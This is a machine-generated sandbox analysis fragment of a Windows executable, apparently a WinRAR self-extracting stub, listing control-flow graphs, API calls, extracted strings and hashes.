7ff7c018e49a-7ff7c018e49d 102->107 111 7ff7c018e686-7ff7c018e6c3 call 7ff7c0181b70 * 2 call 7ff7c01a5c30 106->111 112 7ff7c018e50c-7ff7c018e51f call 7ff7c0188be4 call 7ff7c0186768 106->112 113 7ff7c018e4a1-7ff7c018e4f1 call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c0188dc4 call 7ff7c0181b70 call 7ff7c0185890 107->113 143 7ff7c018e525-7ff7c018e5c5 call 7ff7c018dc4c * 2 call 7ff7c018aee0 call 7ff7c018da04 call 7ff7c018aee0 call 7ff7c018db98 call 7ff7c019c3e8 call 7ff7c01819d0 112->143 144 7ff7c018e5ca-7ff7c018e617 call 7ff7c018da04 AllocConsole 112->144 168 7ff7c018e500 113->168 169 7ff7c018e4f3-7ff7c018e4fc 113->169 116->72 117->100 129 7ff7c018e6f8-7ff7c018e704 call 7ff7c0183b84 118->129 130 7ff7c018e709-7ff7c018e712 SetThreadExecutionState 118->130 119->118 132 7ff7c018e492 123->132 133 7ff7c018e47a 123->133 129->130 132->102 133->93 161 7ff7c018e678-7ff7c018e67f call 7ff7c01819d0 ExitProcess 143->161 154 7ff7c018e674 144->154 155 7ff7c018e619-7ff7c018e66e GetCurrentProcessId AttachConsole call 7ff7c018e72c call 7ff7c018e71c GetStdHandle WriteConsoleW Sleep FreeConsole 144->155 154->161 155->154 168->106 169->113 173 7ff7c018e4fe 169->173 173->106
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                  • API String ID: 751436351-2013832382
                                  • Opcode ID: 407a4525f70a022c2e68e871a7c89ca27ad472116fea8786bc8f1f6d443cd91b
                                  • Instruction ID: 599871247868c7808c559f13d0cce0c175541f7f691f591f7765c29e44d5d812
                                  • Opcode Fuzzy Hash: 407a4525f70a022c2e68e871a7c89ca27ad472116fea8786bc8f1f6d443cd91b
                                  • Instruction Fuzzy Hash: 91624371A19B4196EB11AF64F8801EDF3A4FF44B64F900236DA4D86BA5EF7CE244C790
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWaitWindow
                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                  • API String ID: 2128803032-2702805183
                                  • Opcode ID: dc0dad78b3c29e677cf45a9f803212e6b54bc85ccbfd367d5b6c108a3d480acc
                                  • Instruction ID: 935260eae7fa9189c69564f5db52ac59951af41680e98b299485295daf14e4b3
                                  • Opcode Fuzzy Hash: dc0dad78b3c29e677cf45a9f803212e6b54bc85ccbfd367d5b6c108a3d480acc
                                  • Instruction Fuzzy Hash: 27D28362A1868297EA20BF24F8542BDE391AF85FA0FC04135D95D877A5DF3CF644C7A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$ButtonCheckedMove$DialogItemOperationPathTemp
                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                  • API String ID: 2285161090-3916287355
                                  • Opcode ID: da75e14aee9c57fc50695ab04f93f311b699eb501e07f1c4479dbcc53aecb119
                                  • Instruction ID: 18ba3f3f773e750a98b74056610412607f688c25028e9a4c90aa18fe28af6d22
                                  • Opcode Fuzzy Hash: da75e14aee9c57fc50695ab04f93f311b699eb501e07f1c4479dbcc53aecb119
                                  • Instruction Fuzzy Hash: B2139662B047418AEB10EF64E8402ECE7B1EB41BB8F900535DA5D97B99DF38F595C3A0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1523 7ff7c01a400c-7ff7c01a40e1 call 7ff7c018de94 call 7ff7c0187a28 call 7ff7c019d0a8 call 7ff7c01a74c0 call 7ff7c019d724 1534 7ff7c01a40e3-7ff7c01a40f8 1523->1534 1535 7ff7c01a4118-7ff7c01a413b 1523->1535 1536 7ff7c01a4113 call 7ff7c01a5b1c 1534->1536 1537 7ff7c01a40fa-7ff7c01a410d 1534->1537 1538 7ff7c01a4172-7ff7c01a4195 1535->1538 1539 7ff7c01a413d-7ff7c01a4152 1535->1539 1536->1535 1537->1536 1540 7ff7c01a4695-7ff7c01a469a call 7ff7c01aae94 1537->1540 1544 7ff7c01a4197-7ff7c01a41ac 1538->1544 1545 7ff7c01a41cc-7ff7c01a41ef 1538->1545 1542 7ff7c01a4154-7ff7c01a4167 1539->1542 1543 7ff7c01a416d call 7ff7c01a5b1c 1539->1543 1559 7ff7c01a469b-7ff7c01a46c7 call 7ff7c01aae94 1540->1559 1542->1540 1542->1543 1543->1538 1550 7ff7c01a41c7 call 7ff7c01a5b1c 1544->1550 1551 7ff7c01a41ae-7ff7c01a41c1 1544->1551 1546 7ff7c01a41f1-7ff7c01a4206 1545->1546 1547 7ff7c01a4226-7ff7c01a4232 GetCommandLineW 1545->1547 1553 7ff7c01a4221 call 7ff7c01a5b1c 1546->1553 1554 7ff7c01a4208-7ff7c01a421b 1546->1554 1556 7ff7c01a43ff-7ff7c01a4416 call 7ff7c0187c10 1547->1556 1557 7ff7c01a4238-7ff7c01a426f call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c01a0620 1547->1557 1550->1545 1551->1540 1551->1550 1553->1547 1554->1540 1554->1553 1565 7ff7c01a4441-7ff7c01a459c call 7ff7c0181b70 SetEnvironmentVariableW GetLocalTime call 7ff7c01861e8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff7c019eb64 call 7ff7c0189cac call 7ff7c019a430 * 2 DialogBoxParamW call 7ff7c019a524 * 2 1556->1565 1566 7ff7c01a4418-7ff7c01a443d call 7ff7c0181b70 call 7ff7c01a6e10 1556->1566 1593 7ff7c01a4271-7ff7c01a4284 1557->1593 1594 7ff7c01a42a4-7ff7c01a42ab 1557->1594 1571 7ff7c01a4712-7ff7c01a4728 call 7ff7c018bbf8 1559->1571 1572 7ff7c01a46c9-7ff7c01a46da 1559->1572 1685 7ff7c01a45a4-7ff7c01a45ab 1565->1685 1686 7ff7c01a459e Sleep 1565->1686 1566->1565 1588 7ff7c01a4775-7ff7c01a477f 1571->1588 1589 7ff7c01a472a-7ff7c01a473d 1571->1589 1577 7ff7c01a46f8-7ff7c01a470b call 7ff7c01a5b1c 1572->1577 1578 7ff7c01a46dc-7ff7c01a46ef 1572->1578 1577->1571 1583 7ff7c01a4964-7ff7c01a4971 call 7ff7c01aae94 1578->1583 1584 7ff7c01a46f5 1578->1584 1616 7ff7c01a4976-7ff7c01a49b0 call 7ff7c01a5390 1583->1616 1584->1577 1601 7ff7c01a4781-7ff7c01a4794 1588->1601 1602 7ff7c01a47cc-7ff7c01a47d6 1588->1602 1599 7ff7c01a473f-7ff7c01a4752 1589->1599 1600 7ff7c01a475b-7ff7c01a476e call 7ff7c01a5b1c 1589->1600 1595 7ff7c01a429f call 7ff7c01a5b1c 1593->1595 1596 7ff7c01a4286-7ff7c01a4299 1593->1596 1597 7ff7c01a42b1-7ff7c01a42cb OpenFileMappingW 1594->1597 1598 7ff7c01a4393-7ff7c01a43bd call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c01a3810 1594->1598 1595->1594 1596->1559 1596->1595 1609 7ff7c01a42d1-7ff7c01a42f1 MapViewOfFile 1597->1609 1610 7ff7c01a4388-7ff7c01a4391 CloseHandle 1597->1610 1660 7ff7c01a43c2-7ff7c01a43ca 1598->1660 1599->1583 1611 7ff7c01a4758 1599->1611 1600->1588 1613 7ff7c01a47b2-7ff7c01a47c5 call 7ff7c01a5b1c 1601->1613 1614 7ff7c01a4796-7ff7c01a47a9 1601->1614 1606 7ff7c01a4823-7ff7c01a482d 1602->1606 1607 7ff7c01a47d8-7ff7c01a47eb 1602->1607 1621 7ff7c01a482f-7ff7c01a4842 1606->1621 1622 7ff7c01a487a-7ff7c01a4884 1606->1622 1617 7ff7c01a4809-7ff7c01a481c call 7ff7c01a5b1c 1607->1617 1618 7ff7c01a47ed-7ff7c01a4800 1607->1618 1609->1610 1620 7ff7c01a42f7-7ff7c01a4327 UnmapViewOfFile MapViewOfFile 1609->1620 1610->1556 1611->1600 1613->1602 1614->1583 1625 7ff7c01a47af 1614->1625 1637 7ff7c01a49b5-7ff7c01a4a02 1616->1637 1617->1606 1618->1583 1631 7ff7c01a4806 1618->1631 1620->1610 1634 7ff7c01a4329-7ff7c01a4382 call 7ff7c019dd08 call 7ff7c01a3810 call 7ff7c018bd30 call 7ff7c018be7c call 7ff7c018beec UnmapViewOfFile 1620->1634 1635 7ff7c01a4860-7ff7c01a4873 call 7ff7c01a5b1c 1621->1635 1636 7ff7c01a4844-7ff7c01a4857 1621->1636 1628 7ff7c01a48d1-7ff7c01a495e call 7ff7c0181b70 * 10 1622->1628 1629 7ff7c01a4886-7ff7c01a4899 1622->1629 1625->1613 1628->1583 1639 7ff7c01a48b7-7ff7c01a48ca call 7ff7c01a5b1c 1629->1639 1640 7ff7c01a489b-7ff7c01a48ae 1629->1640 1631->1617 1634->1610 1635->1622 1636->1583 1645 7ff7c01a485d 1636->1645 1637->1616 1639->1628 1640->1583 1650 7ff7c01a48b4 1640->1650 1645->1635 1650->1639 1660->1556 1664 7ff7c01a43cc-7ff7c01a43df 1660->1664 1668 7ff7c01a43e1-7ff7c01a43f4 1664->1668 1669 7ff7c01a43fa call 7ff7c01a5b1c 1664->1669 1668->1669 1673 7ff7c01a468f-7ff7c01a4694 call 7ff7c01aae94 1668->1673 1669->1556 1673->1540 1690 7ff7c01a45b2-7ff7c01a45d5 call 7ff7c018bc5c DeleteObject 1685->1690 1691 7ff7c01a45ad call 7ff7c019dac4 1685->1691 1686->1685 1698 7ff7c01a45d7 DeleteObject 1690->1698 1699 7ff7c01a45dd-7ff7c01a45e4 1690->1699 1691->1690 1698->1699 1700 7ff7c01a4600-7ff7c01a4611 1699->1700 1701 7ff7c01a45e6-7ff7c01a45ed 1699->1701 1704 7ff7c01a4613-7ff7c01a461f call 7ff7c01a3928 CloseHandle 1700->1704 1705 7ff7c01a4625-7ff7c01a4632 1700->1705 1701->1700 1703 7ff7c01a45ef-7ff7c01a45fb call 7ff7c0183ef4 1701->1703 1703->1700 1704->1705 1710 7ff7c01a4634-7ff7c01a4641 1705->1710 1711 7ff7c01a4657-7ff7c01a465c call 7ff7c019d120 1705->1711 1714 7ff7c01a4651-7ff7c01a4653 1710->1714 1715 7ff7c01a4643-7ff7c01a464b 1710->1715 1720 7ff7c01a4661-7ff7c01a468e call 7ff7c01a5c30 1711->1720 1714->1711 1719 7ff7c01a4655 1714->1719 1715->1711 1718 7ff7c01a464d-7ff7c01a464f 1715->1718 1718->1711 1719->1711
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                  • API String ID: 3767324925-3710569615
                                  • Opcode ID: 20d1775a49224c08a607c1f8c530f6c24e73cf66ba70f7089363f0871542fbde
                                  • Instruction ID: a38e384ee595b8270495d2c1e4df41d976d47996ed260b43ee55a997a5e45926
                                  • Opcode Fuzzy Hash: 20d1775a49224c08a607c1f8c530f6c24e73cf66ba70f7089363f0871542fbde
                                  • Instruction Fuzzy Hash: EE427061A1878283EA10AF25F8442BDE3A5FF85FA4FC04235DA5D86B95DF7CF15083A0

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                  • String ID: $%s:$CAPTION
                                  • API String ID: 1936833115-404845831
                                  • Opcode ID: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                  • Instruction ID: 1f118f874c51785e41db3ac4ad7460e496d9a106637a146d3ed17272905c6322
                                  • Opcode Fuzzy Hash: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                  • Instruction Fuzzy Hash: 2791E332A2865287E714EF29B80466EE7A1FB84B94F855135EE4D87B58CF3CF905CB40

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                  • String ID: PNG
                                  • API String ID: 4097654274-364855578
                                  • Opcode ID: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                  • Instruction ID: 182c925661de56797378bb239a266ed4098acd52410ed67ae41b70a2cdd6567c
                                  • Opcode Fuzzy Hash: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                  • Instruction Fuzzy Hash: A341E661A09A0683EA14AF16B49427DE3A1BF88FA4F844435CE4D877A4EF6CF54587A0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2243 7ff7c018647c-7ff7c01864b3 2244 7ff7c01864b9-7ff7c01864c1 2243->2244 2245 7ff7c0186592-7ff7c018659f FindNextFileW 2243->2245 2246 7ff7c01864c6-7ff7c01864d8 FindFirstFileW 2244->2246 2247 7ff7c01864c3 2244->2247 2248 7ff7c01865b3-7ff7c01865b6 2245->2248 2249 7ff7c01865a1-7ff7c01865b1 GetLastError 2245->2249 2246->2248 2250 7ff7c01864de-7ff7c0186506 call 7ff7c01880b0 2246->2250 2247->2246 2252 7ff7c01865b8-7ff7c01865c0 2248->2252 2253 7ff7c01865d1-7ff7c0186613 call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c0188dc4 2248->2253 2251 7ff7c018658a-7ff7c018658d 2249->2251 2263 7ff7c0186508-7ff7c0186524 FindFirstFileW 2250->2263 2264 7ff7c0186527-7ff7c0186530 2250->2264 2254 7ff7c01866ab-7ff7c01866ce call 7ff7c01a5c30 2251->2254 2256 7ff7c01865c5-7ff7c01865cc call 7ff7c0181c80 2252->2256 2257 7ff7c01865c2 2252->2257 2279 7ff7c018664c-7ff7c01866a6 call 7ff7c018e904 * 3 2253->2279 2280 7ff7c0186615-7ff7c018662c 2253->2280 2256->2253 2257->2256 2263->2264 2267 7ff7c0186569-7ff7c018656d 2264->2267 2268 7ff7c0186532-7ff7c0186549 2264->2268 2267->2248 2270 7ff7c018656f-7ff7c018657e GetLastError 2267->2270 2272 7ff7c018654b-7ff7c018655e 2268->2272 2273 7ff7c0186564 call 7ff7c01a5b1c 2268->2273 2274 7ff7c0186588 2270->2274 2275 7ff7c0186580-7ff7c0186586 2270->2275 2272->2273 2277 7ff7c01866d5-7ff7c01866db call 7ff7c01aae94 2272->2277 2273->2267 2274->2251 2275->2251 2275->2274 2279->2254 2282 7ff7c018662e-7ff7c0186641 2280->2282 2283 7ff7c0186647 call 7ff7c01a5b1c 2280->2283 2282->2283 2286 7ff7c01866cf-7ff7c01866d4 call 7ff7c01aae94 2282->2286 2283->2279 2286->2277
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                  • String ID:
                                  • API String ID: 474548282-0
                                  • Opcode ID: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
                                  • Instruction ID: e0c11d28ee222bffc2a6f25bf4661f678bdc09d8ef243374e405807514ba145f
                                  • Opcode Fuzzy Hash: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
                                  • Instruction Fuzzy Hash: 8E61B462A0864682DA10AF14F48426DE361FB84BB4F904331EAAD83BD9DF7CE644C751
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: c
                                  • API String ID: 0-112844655
                                  • Opcode ID: c1e66077c649525df1862831f5d24fee890eb1fa66ff33924af5fad325382aaf
                                  • Instruction ID: f2920adff4aa2d29c03e6a1930b9ab6b61e75426cd36b9621dc9b0ac25b89ac2
                                  • Opcode Fuzzy Hash: c1e66077c649525df1862831f5d24fee890eb1fa66ff33924af5fad325382aaf
                                  • Instruction Fuzzy Hash: 98E1F833A186418BE714DF29E4402ADF7A2F788B68F904235DA5DA3B88DB3CF541CB50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1640375df0da50ca5502ff379811adc42cd9556f3aea87c2937a80ee4e565aef
                                  • Instruction ID: d708aa9446401f98167326ba24a91aa551ddccba236f55d9983495cb37a6a6ea
                                  • Opcode Fuzzy Hash: 1640375df0da50ca5502ff379811adc42cd9556f3aea87c2937a80ee4e565aef
                                  • Instruction Fuzzy Hash: 59228C62E08A5283EA10AF14B85417DE6AABF40F78F990135DA5ED7794DF3DF80187B0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1725 7ff7c01a5390-7ff7c01a5419 call 7ff7c01a4fe8 1728 7ff7c01a5444-7ff7c01a5461 1725->1728 1729 7ff7c01a541b-7ff7c01a543f call 7ff7c01a52f8 RaiseException 1725->1729 1731 7ff7c01a5463-7ff7c01a5474 1728->1731 1732 7ff7c01a5476-7ff7c01a547a 1728->1732 1735 7ff7c01a5648-7ff7c01a5665 1729->1735 1734 7ff7c01a547d-7ff7c01a5489 1731->1734 1732->1734 1736 7ff7c01a54aa-7ff7c01a54ad 1734->1736 1737 7ff7c01a548b-7ff7c01a549d 1734->1737 1738 7ff7c01a5554-7ff7c01a555b 1736->1738 1739 7ff7c01a54b3-7ff7c01a54b6 1736->1739 1749 7ff7c01a54a3 1737->1749 1750 7ff7c01a5619-7ff7c01a5623 1737->1750 1741 7ff7c01a556f-7ff7c01a5572 1738->1741 1742 7ff7c01a555d-7ff7c01a556c 1738->1742 1743 7ff7c01a54b8-7ff7c01a54cb 1739->1743 1744 7ff7c01a54cd-7ff7c01a54e2 LoadLibraryExA 1739->1744 1745 7ff7c01a5615 1741->1745 1746 7ff7c01a5578-7ff7c01a557c 1741->1746 1742->1741 1743->1744 1748 7ff7c01a5539-7ff7c01a5542 1743->1748 1747 7ff7c01a54e4-7ff7c01a54f7 GetLastError 1744->1747 1744->1748 1745->1750 1752 7ff7c01a55ab-7ff7c01a55be GetProcAddress 1746->1752 1753 7ff7c01a557e-7ff7c01a5582 1746->1753 1754 7ff7c01a54f9-7ff7c01a550c 1747->1754 1755 7ff7c01a550e-7ff7c01a5534 call 7ff7c01a52f8 RaiseException 1747->1755 1758 7ff7c01a5544-7ff7c01a5547 FreeLibrary 1748->1758 1759 7ff7c01a554d 1748->1759 1749->1736 1756 7ff7c01a5640 call 7ff7c01a52f8 1750->1756 1757 7ff7c01a5625-7ff7c01a5636 1750->1757 1752->1745 1764 7ff7c01a55c0-7ff7c01a55d3 GetLastError 1752->1764 1753->1752 1761 7ff7c01a5584-7ff7c01a558f 1753->1761 1754->1748 1754->1755 1755->1735 1767 7ff7c01a5645 1756->1767 1757->1756 1758->1759 1759->1738 1761->1752 1765 7ff7c01a5591-7ff7c01a5598 1761->1765 1769 7ff7c01a55d5-7ff7c01a55e8 1764->1769 1770 7ff7c01a55ea-7ff7c01a5611 call 7ff7c01a52f8 RaiseException call 7ff7c01a4fe8 1764->1770 1765->1752 1771 7ff7c01a559a-7ff7c01a559f 1765->1771 1767->1735 1769->1745 1769->1770 1770->1745 1771->1752 1773 7ff7c01a55a1-7ff7c01a55a9 1771->1773 1773->1745 1773->1752
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
